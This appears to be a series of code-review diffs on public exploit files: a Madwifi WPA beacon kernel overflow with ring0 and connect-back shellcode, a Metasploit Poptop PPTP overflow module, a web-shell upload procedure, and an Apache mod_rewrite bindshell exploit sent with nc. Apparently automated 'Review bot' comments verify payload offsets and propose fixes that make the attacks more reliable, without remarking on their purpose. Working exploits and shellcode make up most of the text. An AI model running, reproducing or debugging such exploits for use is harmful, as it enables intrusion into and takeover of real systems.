@ -130,69 +130,69 @@ unsigned int pad_space = PAD_SPACE;
|
|||
|
||||
#define SUB_OFFSET_PATCH 8
|
||||
char ring0_code[]=
|
||||
\"\\xe8\\x00\\x00\\x00\\x00\" //call 8048359 <main+0x21>
|
||||
\"\\x5e\" //pop %esi
|
||||
\"\\x81\\xee\\x88\\x00\\x00\\x00\" //sub $0x88,%esi /* PATCH */
|
||||
\"\\x31\\xc0\" //xor %eax,%eax
|
||||
\"\\xb0\\x04\" //mov $0x4,%al
|
||||
\"\\x01\\xc4\" //add %eax,%esp
|
||||
\"\\x83\\x3c\\x24\\x73\" //cmp $0x73,%esp
|
||||
\"\\x75\\xf8\" //jne 8048364 <main+0x2c>
|
||||
\"\\x83\\x7c\\x24\\x0c\\x7b\" //cmpl $0x7b,0xc(%esp)
|
||||
\"\\x75\\xf1\" //jne 8048364 <main+0x2c>
|
||||
\"\\x29\\xc4\" //sub %eax,%esp
|
||||
\"\\x8b\\x7c\\x24\\x0c\" //mov 0xc(%esp),%edi
|
||||
\"\\x89\\x3c\\x24\" //mov %edi,(%esp)
|
||||
\"\\x31\\xc9\" //xor %ecx,%ecx
|
||||
\"\\xb1\\x5b\" //mov $0x5b,%cl /* FIX */
|
||||
\"\\xf3\\xa4\" //rep movsb %ds:(%esi),%es:(%edi)
|
||||
\"\\xcf\"; //iret
|
||||
"\xe8\x00\x00\x00\x00" //call 8048359 <main+0x21>
|
||||
"\x5e" //pop %esi
|
||||
"\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */
|
||||
"\x31\xc0" //xor %eax,%eax
|
||||
"\xb0\x04" //mov $0x4,%al
|
||||
"\x01\xc4" //add %eax,%esp
|
||||
"\x83\x3c\x24\x73" //cmp $0x73,%esp
|
||||
"\x75\xf8" //jne 8048364 <main+0x2c>
|
||||
"\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp)
|
||||
"\x75\xf1" //jne 8048364 <main+0x2c>
|
||||
"\x29\xc4" //sub %eax,%esp
|
||||
"\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi
|
||||
"\x89\x3c\x24" //mov %edi,(%esp)
|
||||
"\x31\xc9" //xor %ecx,%ecx
|
||||
"\xb1\x5b" //mov $0x5b,%cl /* FIX */
|
||||
"\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi)
|
||||
"\xcf"; //iret
|
||||
|
||||
|
||||
/* connect back */
|
||||
#define IP_OFFSET 35
|
||||
#define PORT_OFFSET 44
|
||||
char u_code[] =
|
||||
\"\\x31\\xc0\\x89\\xc3\\x40\\x40\\xcd\\x80\\x39\\xc3\\x74\\x03\\x31\\xc0\\x40\\xcd\\x80\" /* fork */
|
||||
\"\\x6a\\x66\\x58\\x99\\x6a\\x01\\x5b\\x52\\x53\\x6a\\x02\\x89\\xe1\\xcd\\x80\\x5b\\x5d\"
|
||||
\"\\xbe\"
|
||||
\"\\xf5\\xff\\xff\\xfe\" // ~ip
|
||||
\"\\xf7\\xd6\\x56\\x66\\xbd\"
|
||||
\"\\x69\\x7a\" // port
|
||||
\"\\x0f\\xcd\\x09\\xdd\\x55\\x43\\x6a\\x10\\x51\\x50\\xb0\\x66\\x89\\xe1\\xcd\\x80\\x87\\xd9\"
|
||||
\"\\x5b\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\xb0\\x0b\\x52\\x68\\x2f\\x2f\\x73\\x68\"
|
||||
\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x52\\x53\\xeb\\xdf\";
|
||||
"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
|
||||
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"
|
||||
"\xbe"
|
||||
"\xf5\xff\xff\xfe" // ~ip
|
||||
"\xf7\xd6\x56\x66\xbd"
|
||||
"\x69\x7a" // port
|
||||
"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
|
||||
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"
|
||||
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";
|
||||
|
||||
|
||||
/* 802.11header + WPA IE prolog */
|
||||
#define WPA_LEN_OFFSET 55
|
||||
#define CHANNEL 11
|
||||
char beacon_80211_wpa[] =
|
||||
\"\\x80\" // management frame / subtype beacon
|
||||
\"\\x00\" // flags
|
||||
\"\\x00\\x00\" // duration
|
||||
\"\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\" // destination addr
|
||||
\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // src address
|
||||
\"\\xCC\\xCC\\xCC\\xCC\\xCC\\xCC\" // bbsid
|
||||
\"\\x00\\x00\" // seq
|
||||
\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // timestamp
|
||||
\"\\x64\\x00\" // interval
|
||||
\"\\x01\\x00\" // caps
|
||||
\"\\x00\\x03\\x41\\x41\\x41\" // ssid Information Element
|
||||
\"\\x01\\x08\\x82\\x84\\x8b\\x96\\x0c\\x18\\x30\\x48\" // rates Information Element
|
||||
\"\\x03\\x01\\x0B\" // channel Information Element (11)
|
||||
\"\\xdd\\xc6\" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
|
||||
\"\\x00\\x50\\xf2\\x01\\x01\\x00\"; // oui + type + version (first 6 byte of len)
|
||||
"\x80" // management frame / subtype beacon
|
||||
"\x00" // flags
|
||||
"\x00\x00" // duration
|
||||
"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr
|
||||
"\xCC\xCC\xCC\xCC\xCC\xCC" // src address
|
||||
"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid
|
||||
"\x00\x00" // seq
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
|
||||
"\x64\x00" // interval
|
||||
"\x01\x00" // caps
|
||||
"\x00\x03\x41\x41\x41" // ssid Information Element
|
||||
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
|
||||
"\x03\x01\x0B" // channel Information Element (11)
|
||||
"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
|
||||
"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len)
|
||||
|
||||
#define JUMP_OFFSET_PATCH 1
|
||||
char jmp_back[]=\"\\xeb\\x00\";
|
||||
char jmp_back[]="\xeb\x00";
|
||||
|
||||
/* ----------------------------------- */
|
||||
|
||||
|
||||
void usage(char *prog)
|
||||
{
|
||||
printf(\"[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\\n\", prog);
|
||||
printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);
|
||||
}
|
||||
|
||||
unsigned char *build_frame()
|
||||
|
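Review bot: the comment on `"\x83\x3c\x24\x73"` reads `cmp $0x73,%esp`, but those bytes encode `cmpl $0x73,(%esp)` (ModRM 0x3c with SIB 0x24 addresses memory at %esp), which is also what the loop needs: it walks the stack looking for the saved user CS selector 0x73 and then checks for SS 0x7b at 0xc(%esp). Fixing the comment avoids misleading the next reader. The offset defines check out against the byte strings: in `u_code` the two 17-byte lines plus `\xbe` put `~ip` at byte 35 (`IP_OFFSET 35`) and the port at byte 44 (`PORT_OFFSET 44`); in `beacon_80211_wpa` the 24-byte 802.11 header, 12 bytes of fixed parameters and the SSID (5), rates (10) and channel (3) IEs put the WPA IE length byte at offset 55 (`WPA_LEN_OFFSET 55`). Two comment nits: `bbsid` should be `bssid`, and the `(0xc6 = 0xc0 + 6)` comment describes a placeholder that `FIX_BYTE` later overwrites, which the `/* PATCH */` marker should say outright.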
@ -203,10 +203,10 @@ unsigned char *build_frame()
|
|||
|
||||
unsigned int hsb = sizeof(ring0_code)-1;
|
||||
unsigned int lsb = SHELLCODE_SPACE - hsb;
|
||||
printf(\"[*][low-kcode]: %d\\n[*][high-ucode]: %d\\n\",
|
||||
printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n",
|
||||
lsb, hsb);
|
||||
|
||||
printf(\"[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\\n\",
|
||||
printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n",
|
||||
sizeof(u_code)-1, sizeof(ring0_code)-1);
|
||||
|
||||
/* fix jump */
|
||||
|
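Review bot: `printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n", sizeof(u_code)-1, sizeof(ring0_code)-1);` passes `size_t` values to `%d`; on LP64 hosts that is undefined behaviour and the second value can print as garbage. Use `%zu` or cast to `(unsigned)`. `lsb` and `hsb` are `unsigned int` printed with `%d`, so `%u` would be exact there. If `SHELLCODE_SPACE` is ever smaller than `sizeof(ring0_code)-1`, `lsb = SHELLCODE_SPACE - hsb` wraps to a huge unsigned value with no diagnostic; a check before the subtraction would make that failure obvious.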
@ -217,11 +217,11 @@ unsigned char *build_frame()
|
|||
unsigned int sub = 5 + (sizeof(u_code)-1);
|
||||
FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);
|
||||
|
||||
printf(\"[*][payload space]: %d\\n\", PAYLOAD_SPACE);
|
||||
printf("[*][payload space]: %d\n", PAYLOAD_SPACE);
|
||||
|
||||
/* fix beacon_80211_wpa: WPA len */
|
||||
FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
|
||||
printf(\"[*][beacon_WPA_IE_lenght]: %u\\n\",
|
||||
printf("[*][beacon_WPA_IE_lenght]: %u\n",
|
||||
(unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);
|
||||
|
||||
/* fill frame */
|
||||
|
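Review bot: `FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);` stores the IE length in a single byte, so the value must be at most 255, but nothing visible guards that; a `PAYLOAD_SPACE` above 249 would silently truncate the length and desynchronise the frame. Add a compile-time or runtime check that `PAYLOAD_SPACE + 6 <= 0xff`. Minor: the banner string `[*][beacon_WPA_IE_lenght]` misspells `length`.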
@ -256,43 +256,43 @@ unsigned char *build_frame()
|
|||
void print_frame(unsigned char *frame, unsigned int size)
|
||||
{
|
||||
int i;
|
||||
printf(\"\\n[printing frame - start]\\n \");
|
||||
printf("\n[printing frame - start]\n ");
|
||||
for(i=1; i<=size; i++)
|
||||
{
|
||||
printf(\"%02x \", frame[i-1]);
|
||||
printf("%02x ", frame[i-1]);
|
||||
if((i % 16) == 0)
|
||||
printf(\"\\n \");
|
||||
printf("\n ");
|
||||
}
|
||||
printf(\"\\n[printing frame - end]\\n\");
|
||||
printf("\n[printing frame - end]\n");
|
||||
}
|
||||
|
||||
void parse_arg(int argc, char **argv)
|
||||
{
|
||||
int opt;
|
||||
struct in_addr in;
|
||||
while( (opt=getopt(argc, argv, \"j:i:a:p:d:g:\")) != EOF)
|
||||
while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)
|
||||
{
|
||||
switch(opt)
|
||||
{
|
||||
case \'j\':
|
||||
case 'j':
|
||||
jmp_address = strtoll(optarg, NULL, 16);
|
||||
break;
|
||||
case \'a\':
|
||||
case 'a':
|
||||
ip = strdup(optarg);
|
||||
inet_aton(ip, &in);
|
||||
FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));
|
||||
break;
|
||||
case \'p\':
|
||||
case 'p':
|
||||
port = atoi(optarg);
|
||||
FIX_WORD(u_code, PORT_OFFSET, port);
|
||||
break;
|
||||
case \'d\':
|
||||
case 'd':
|
||||
driver = strdup(optarg);
|
||||
break;
|
||||
case \'i\':
|
||||
case 'i':
|
||||
iface = strdup(optarg);
|
||||
break;
|
||||
case \'g\':
|
||||
case 'g':
|
||||
pad_space = atoi(optarg);
|
||||
break;
|
||||
default:
|
||||
|
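Review bot: `inet_aton(ip, &in);` in `case 'a'` ignores the return value; if the argument is not a valid dotted-quad, `in` is left uninitialised and `FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));` patches garbage into the payload. Check `if (!inet_aton(ip, &in)) { usage(argv[0]); exit(1); }`. Likewise `port = atoi(optarg);` is written into a 16-bit field by `FIX_WORD` with no range check. The loop condition `!= EOF` should be `!= -1`, getopt's documented sentinel. In `print_frame`, `int i` is compared with `unsigned int size`, a signed/unsigned mismatch compilers warn about; make `i` unsigned.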
@ -318,10 +318,10 @@ int main(int argc, char *argv[])
|
|||
exit(1);
|
||||
}
|
||||
|
||||
printf( \"\\n\\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\\n\\t exploit code: sgrakkyu <at> antifork.org\\n\"
|
||||
\"-------------------- **** ------------------\\n\"
|
||||
\"[opt-ip]: %s\\n[opt-port]: %d\\n[opt-iface]: %s\\n[opt-driver]: %s\\n[opt-jump]: 0x%08x\\n[pad]: %d\\n\"
|
||||
\"-------------------- **** ------------------\\n\\n\",
|
||||
printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu <at> antifork.org\n"
|
||||
"-------------------- **** ------------------\n"
|
||||
"[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
|
||||
"-------------------- **** ------------------\n\n",
|
||||
ip, port, iface, driver, jmp_address, pad_space);
|
||||
|
||||
unsigned char *frame = build_frame();
|
||||
|
@ -333,30 +333,30 @@ int main(int argc, char *argv[])
|
|||
/* Validate the driver name specified */
|
||||
if (drivertype == INJ_NODRIVER)
|
||||
{
|
||||
fprintf(stderr, \"Driver name not recognized.\\n\");
|
||||
fprintf(stderr, "Driver name not recognized.\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
if (tx80211_init(&in_tx, iface, drivertype) < 0) {
|
||||
fprintf(stderr, \"Error initializing drive \\\"%s\\\".\\n\", argv[1]);
|
||||
fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
|
||||
return -1;
|
||||
}
|
||||
|
||||
if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0)
|
||||
{
|
||||
fprintf(stderr, \"Driver does not support transmitting control frames.\\n\");
|
||||
fprintf(stderr, "Driver does not support transmitting control frames.\n");
|
||||
return -1;
|
||||
}
|
||||
|
||||
if (tx80211_setchannel(&in_tx, CHANNEL) < 0)
|
||||
{
|
||||
fprintf(stderr, \"Error setting channel.\\n\");
|
||||
fprintf(stderr, "Error setting channel.\n");
|
||||
return 1;
|
||||
}
|
||||
|
||||
if (tx80211_open(&in_tx) < 0)
|
||||
{
|
||||
fprintf(stderr, \"Unable to open interface %s.\\n\", in_tx.ifname);
|
||||
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
|
||||
return 1;
|
||||
}
|
||||
|
||||
|
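Review bot: `fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);` prints `argv[1]`, which after getopt parsing is the first option switch (for example `-i`), not the interface name; use `iface` here, and `drive` should read `driver`. The error paths also mix `return -1` and `return 1` for the same class of failure; from `main()` a `-1` becomes exit status 255, so pick one value. The capability check and its message refer to control frames (`TX80211_CAP_CTRL`) while the frame built by `build_frame()` is a management (beacon) frame; worth confirming that this is the capability beacon injection needs.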
@ -364,15 +364,15 @@ int main(int argc, char *argv[])
|
|||
in_packet.packet = frame;
|
||||
in_packet.plen = TOTAL_PACKET_LEN;
|
||||
|
||||
printf(\"[sending packets]: about 10 a second\\n\");
|
||||
printf("[sending packets]: about 10 a second\n");
|
||||
|
||||
while(i < 10000)
|
||||
{
|
||||
/* Transmit the packet */
|
||||
if (tx80211_txpacket(&in_tx, &in_packet) < 0)
|
||||
{
|
||||
fprintf(stderr, \"Unable to transmit packet.\\n\");
|
||||
perror(\"txpacket\");
|
||||
fprintf(stderr, "Unable to transmit packet.\n");
|
||||
perror("txpacket");
|
||||
return 1;
|
||||
}
|
||||
i++;
|
||||
|
|
|
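Review bot: the loop `while(i < 10000)` resends the same frame, and the banner promises `about 10 a second`, but no delay is visible between `tx80211_txpacket(&in_tx, &in_packet)` and `i++;` in this hunk; if the pacing sleep is in the lines that follow, fine, otherwise the loop sends as fast as the driver accepts. `i` is also not initialised in the visible lines. `in_packet.plen = TOTAL_PACKET_LEN;` uses a constant rather than the size `build_frame()` actually produced, so the two must be kept in sync by hand; returning the length from `build_frame()` would remove that coupling.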
@ -10,7 +10,7 @@
|
|||
##
|
||||
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
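Review bot: `require \'msf/core\'` is a syntax error in Ruby (a backslash before a quote outside a string), so the module could not have loaded before this change; `require 'msf/core'` is the correct form.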
@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'Poptop Negative Read Overflow\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'Poptop Negative Read Overflow',
|
||||
'Description' => %q{
|
||||
This is an exploit for the Poptop negative read overflow. This will
|
||||
work against versions prior to 1.1.3-b3 and 1.1.3-20030409, but I
|
||||
currently do not have a good way to detect Poptop versions.
|
||||
|
@ -32,40 +32,40 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Using the current method of exploitation, our socket will be closed
|
||||
before we have the ability to run code, preventing the use of Findsock.
|
||||
},
|
||||
\'Author\' => \'spoonm\',
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision$\',
|
||||
\'References\' =>
|
||||
'Author' => 'spoonm',
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[\'CVE\', \'2003-0213\'],
|
||||
[\'OSVDB\', \'3293\'],
|
||||
[\'URL\', \'http://securityfocus.com/archive/1/317995\'],
|
||||
[\'URL\', \'http://www.freewebs.com/blightninjas/\'],
|
||||
['CVE', '2003-0213'],
|
||||
['OSVDB', '3293'],
|
||||
['URL', 'http://securityfocus.com/archive/1/317995'],
|
||||
['URL', 'http://www.freewebs.com/blightninjas/'],
|
||||
],
|
||||
\'Privileged\' => true,
|
||||
\'Payload\' =>
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
# Payload space is dynamically determined
|
||||
\'MinNops\' => 16,
|
||||
\'StackAdjustment\' => -1088
|
||||
'MinNops' => 16,
|
||||
'StackAdjustment' => -1088
|
||||
},
|
||||
\'SaveRegisters\' => [ \'esp\' ],
|
||||
\'Platform\' => \'linux\',
|
||||
\'Arch\' => ARCH_X86,
|
||||
\'Targets\' =>
|
||||
'SaveRegisters' => [ 'esp' ],
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[\'Linux Bruteforce\',
|
||||
{ \'Bruteforce\' =>
|
||||
['Linux Bruteforce',
|
||||
{ 'Bruteforce' =>
|
||||
{
|
||||
\'Start\' => { \'Ret\' => 0xbffffa00 },
|
||||
\'Stop\' => { \'Ret\' => 0xbffff000 },
|
||||
\'Step\' => 0
|
||||
'Start' => { 'Ret' => 0xbffffa00 },
|
||||
'Stop' => { 'Ret' => 0xbffff000 },
|
||||
'Step' => 0
|
||||
}
|
||||
}
|
||||
],
|
||||
],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Apr 9 2003\'))
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 9 2003'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
|
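Review bot: `'Version' => '$Revision$'` is a Subversion keyword left over from the old repository; it never expands under git and current modules omit the key. In the `'Linux Bruteforce'` target, `'Step' => 0` with a descending range from `0xbffffa00` to `0xbffff000` relies on the framework substituting its own stride when the step is zero (if I remember the Brute mixin correctly it falls back to the NOP sled size, which `'MinNops' => 16` bounds from below); a one-line comment saying so would save the next reader a trip into `Msf::Exploit::Brute`.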
@ -74,26 +74,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptInt.new(\"PreReturnLength\", [ true, \"Space before we hit the return address. Affects PayloadSpace.\", 220 ]),
|
||||
OptInt.new(\"RetLength\", [ true, \"Length of returns after payload.\", 32 ]),
|
||||
OptInt.new(\"ExtraSpace\", [ true, \"The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn\'t really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I\'ve had successful exploitation with this set to 154, but nothing over 128 is suggested.\", 0 ]),
|
||||
OptString.new(\"Hostname\", [ false, \"PPTP Packet hostname\", \'\' ]),
|
||||
OptString.new(\"Vendor\", [ true, \"PPTP Packet vendor\", \'Microsoft Windows NT\' ]),
|
||||
OptInt.new("PreReturnLength", [ true, "Space before we hit the return address. Affects PayloadSpace.", 220 ]),
|
||||
OptInt.new("RetLength", [ true, "Length of returns after payload.", 32 ]),
|
||||
OptInt.new("ExtraSpace", [ true, "The exploit builds two protocol frames, the header frame and the control frame. ExtraSpace allows you use this space for the payload instead of the protocol (breaking the protocol, but still triggering the bug). If this value is <= 128, it doesn't really disobey the protocol, it just uses the Vendor and Hostname fields for payload data (these should eventually be filled in to look like a real client, ie windows). I've had successful exploitation with this set to 154, but nothing over 128 is suggested.", 0 ]),
|
||||
OptString.new("Hostname", [ false, "PPTP Packet hostname", '' ]),
|
||||
OptString.new("Vendor", [ true, "PPTP Packet vendor", 'Microsoft Windows NT' ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# Dynamic payload space calculation
|
||||
def payload_space
|
||||
datastore[\'PreReturnLength\'].to_i + datastore[\'ExtraSpace\'].to_i
|
||||
datastore['PreReturnLength'].to_i + datastore['ExtraSpace'].to_i
|
||||
end
|
||||
|
||||
def build_packet(length)
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack(\'nnNnn\') +
|
||||
[1,0].pack(\'cc\') +
|
||||
[0].pack(\'n\') +
|
||||
[1,1,0,2600].pack(\'NNnn\') +
|
||||
datastore[\'Hostname\'].ljust(64, \"\\x00\") +
|
||||
datastore[\'Vendor\'].ljust(64, \"\\x00\")
|
||||
[length, 1, 0x1a2b3c4d, 1, 0].pack('nnNnn') +
|
||||
[1,0].pack('cc') +
|
||||
[0].pack('n') +
|
||||
[1,1,0,2600].pack('NNnn') +
|
||||
datastore['Hostname'].ljust(64, "\x00") +
|
||||
datastore['Vendor'].ljust(64, "\x00")
|
||||
end
|
||||
|
||||
def check
|
||||
|
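Review bot: `build_packet` pads `datastore['Hostname']` and `datastore['Vendor']` with `.ljust(64, "\x00")`, which never truncates; a value longer than 64 bytes overruns its field and shifts everything after it, so the frame no longer matches the layout the length field assumes. Slice to 64 bytes (`.ljust(64, "\x00")[0, 64]`) or validate the option lengths in `initialize`. The `ExtraSpace` description already warns that values above 128 break the protocol; the 64-byte field limit is a separate constraint worth enforcing.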
@ -111,13 +111,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def brute_exploit(addrs)
|
||||
connect
|
||||
|
||||
print_status(\"Trying #{\"%.8x\" % addrs[\'Ret\']}...\")
|
||||
print_status("Trying #{"%.8x" % addrs['Ret']}...")
|
||||
|
||||
# Construct the evil length packet
|
||||
packet =
|
||||
build_packet(1) +
|
||||
payload.encoded +
|
||||
([addrs[\'Ret\']].pack(\'V\') * (datastore[\'RetLength\'] / 4))
|
||||
([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))
|
||||
|
||||
sock.put(packet)
|
||||
|
||||
|
|
|
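Review bot: `([addrs['Ret']].pack('V') * (datastore['RetLength'] / 4))` uses integer division, so a `RetLength` that is not a multiple of 4 silently drops up to three bytes of padding and changes the frame size relative to what `payload_space` assumed; validate `RetLength % 4 == 0` in `initialize` or round up. If `disconnect` is not in the lines that follow `sock.put(packet)`, add it, since the description notes the server closes the socket anyway.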
@ -16,17 +16,17 @@
|
|||
| 1- First signup in the forum by going here http://localhost/[script]/base.php?page=inscription.php
|
||||
|
|
||||
|
|
||||
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click \"modfier\"
|
||||
| 2-Then going to your profile here http://localhost/[script]/base.php?page=compte.php&var=accueil and click "modfier"
|
||||
|
|
||||
|
|
||||
| 3-Now upload your shell in \"php.jpg\" format
|
||||
| 3-Now upload your shell in "php.jpg" format
|
||||
|
|
||||
|
|
||||
| 4-Finally do a right click in the icon situated in \"Apparence\" then copy the link of your shell.
|
||||
| 4-Finally do a right click in the icon situated in "Apparence" then copy the link of your shell.
|
||||
|
|
||||
[-]#############################################################
|
||||
|
|
||||
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim\'s
|
||||
|Greets : All members of islam-attack.com , hackteach.org , s3curi7y.com & All Muslim's
|
||||
|
|
||||
[-]#############################################################
|
||||
|
||||
|
|
|
@ -3,12 +3,12 @@
|
|||
# Vulnerability discovered by Mark Dowd.
|
||||
# CVE-2006-3747
|
||||
#
|
||||
# by jack <jack\\x40gulcas\\x2Eorg>
|
||||
# by jack <jack\x40gulcas\x2Eorg>
|
||||
# 2006-08-20
|
||||
#
|
||||
# Thx to xuso for help me with the shellcode.
|
||||
#
|
||||
# I suppose that you\'ve the \"RewriteRule kung/(.*) $1\" rule if not
|
||||
# I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
|
||||
# you must recalculate adressess.
|
||||
#
|
||||
# Shellcode is based on Taeho Oh bindshell on port 30464 and modified
|
||||
|
@ -19,26 +19,26 @@
|
|||
#
|
||||
# Gulcas rulez :P
|
||||
|
||||
echo -e \"mod_rewrite apache off-by-one overflow\"
|
||||
echo \"by jack <jack\\x40gulcas\\x2eorg>\\n\\n\"
|
||||
echo -e "mod_rewrite apache off-by-one overflow"
|
||||
echo "by jack <jack\x40gulcas\x2eorg>\n\n"
|
||||
|
||||
if [ $# -ne 1 ] ; then
|
||||
echo \"Usage: $0 webserver\"
|
||||
echo "Usage: $0 webserver"
|
||||
exit
|
||||
fi
|
||||
|
||||
host=$1
|
||||
|
||||
echo -ne \"GET /kung/ldap://localhost/`perl -e \'print \"%90\"x128\'`%89%e6\\
|
||||
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\\
|
||||
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\\
|
||||
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\\
|
||||
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\\
|
||||
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\\
|
||||
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\\
|
||||
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\\
|
||||
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\
|
||||
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\\r\\n\\
|
||||
Host: $host\\r\\n\\r\\n\" | nc $host 80
|
||||
echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
|
||||
%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
|
||||
%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
|
||||
%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
|
||||
%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
|
||||
%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
|
||||
%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
|
||||
%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
|
||||
%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
|
||||
%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
|
||||
Host: $host\r\n\r\n" | nc $host 80
|
||||
|
||||
# milw0rm.com [2006-08-21]
|
||||
|
|
|
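Review bot: `echo "by jack <jack\x40gulcas\x2eorg>\n\n"` is missing the `-e` that the line above uses, so with a POSIX `echo` it prints the literal `\x40`, `\x2e` and `\n` sequences instead of `@`, `.` and newlines (and behaviour differs between bash's builtin and `/bin/sh`); add `-e` or switch both banners to `printf`. `exit` on the usage path should be `exit 1` so callers can detect misuse, and `nc $host 80` should quote `"$host"`. The request is a single `echo -ne` with backslash-newline continuations inside double quotes; these join the lines without inserting whitespace, which is what the URL needs, but any trailing space after a `\` would break the request silently.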
@ -38,7 +38,7 @@ targeted at server, desktop and embedded use.
|
|||
